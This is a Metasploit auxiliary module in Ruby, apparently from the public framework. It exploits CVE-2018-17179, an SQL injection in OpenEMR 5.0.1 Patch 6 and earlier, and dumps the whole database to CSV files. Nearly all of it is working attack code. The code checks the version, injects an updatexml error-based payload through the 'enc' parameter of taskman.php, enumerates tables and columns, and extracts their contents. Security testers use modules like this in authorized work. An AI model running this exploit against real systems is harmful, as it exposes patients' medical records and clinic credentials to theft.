modules/auxiliary/sqli/openemr/openemr_sqli_dump.rb
require 'csv'
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::SQLi
def initialize(info = {})
super(update_info(info,
'Name' => 'OpenEMR 5.0.1 Patch 6 SQLi Dump',
'Description' => '
This module exploits a SQLi vulnerability found in
OpenEMR version 5.0.1 Patch 6 and lower. The
vulnerability allows the contents of the entire
database (with exception of log and task tables) to be
extracted.
This module saves each table as a `.csv` file in your
loot directory and has been tested with
OpenEMR 5.0.1 (3).
',
'License' => MSF_LICENSE,
'Author' =>
[
'Will Porter <will.porter[at]lodestonesecurity.com>'
],
'References' => [
['CVE', '2018-17179'],
['URL', 'https://github.com/openemr/openemr/commit/3e22d11c7175c1ebbf3d862545ce6fee18f70617']
],
'DisclosureDate' => '2019-05-17'
))
register_options(
[
OptString.new('TARGETURI', [true, 'The base path to the OpenEMR installation', '/openemr'])
]
)
end
def uri
target_uri.path
end
def openemr_version
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(uri, 'admin.php')
)
vprint_status("admin.php response code: #{res.code}")
document = Nokogiri::HTML(res.body)
document.css('tr')[1].css('td')[3].text
rescue StandardError
''
end
def check
# Check version
print_status('Trying to detect installed version')
version = openemr_version
return Exploit::CheckCode::Unknown if version.empty?
vprint_status("Version #{version} detected")
version.sub! ' (', '.'
version.sub! ')', ''
version.strip!
return Exploit::CheckCode::Safe unless Rex::Version.new(version) < Rex::Version.new('5.0.1.7')
Exploit::CheckCode::Appears
end
def get_response(payload)
send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(uri, 'interface', 'forms', 'eye_mag', 'taskman.php'),
'vars_get' => {
'action' => 'make_task',
'from_id' => '1',
'to_id' => '1',
'pid' => '1',
'doc_type' => '1',
'doc_id' => '1',
'enc' => "1' and updatexml(1,concat(0x7e, (#{payload})),0) or '"
}
)
end
def save_csv(data, table)
# Use the same gsub pattern as store_loot
# this will put the first 8 safe characters of the tablename
# in the filename in the loot directory
safe_table = table.gsub(/[^a-z0-9\.\_]+/i, '')
store_loot(
"openemr.#{safe_table}.dump",
'application/CSV',
rhost,
data.map(&:to_csv).join,
"#{safe_table}.csv"
)
end
def dump_all
sqli_opts = {
truncation_length: 31, # slices of 31 bytes of the query response are returned
encoder: :base64, # the web application messes up multibyte characters, better encode
verbose: datastore['VERBOSE']
}
sqli = create_sqli(dbms: MySQLi::Common, opts: sqli_opts) do |payload|
res = get_response(payload)
if res && (response = res.body[%r{XPATH syntax error: '~(.*?)'</font>}m, 1])
response
else
''
end
end
unless sqli.test_vulnerable
fail_with Failure::NotVulnerable, 'The target does not seem vulnerable.'
end
print_good 'The target seems vulnerable.'
db_version = sqli.version
print_status("DB Version: #{db_version}")
print_status('Enumerating tables, this may take a moment...')
tables = sqli.enum_table_names
num_tables = tables.length
print_status("Identified #{num_tables} tables.")
# These tables are impossible to fetch because they increase each request
skiptables = %w[form_taskman log log_comment_encrypt]
# large table containing text in different languages, >4mb in size
skiptables << 'lang_definitions'
tables.each_with_index do |table, i|
if skiptables.include?(table)
print_status("Skipping table (#{i + 1}/#{num_tables}): #{table}")
else
columns_of_table = sqli.enum_table_columns(table)
print_status("Dumping table (#{i + 1}/#{num_tables}): #{table}(#{columns_of_table.join(', ')})")
table_data = sqli.dump_table_fields(table, columns_of_table)
table_data.unshift(columns_of_table)
save_csv(table_data, table)
end
end
print_status("Dumped all tables to #{Msf::Config.loot_directory}")
end
def run
dump_all
end
end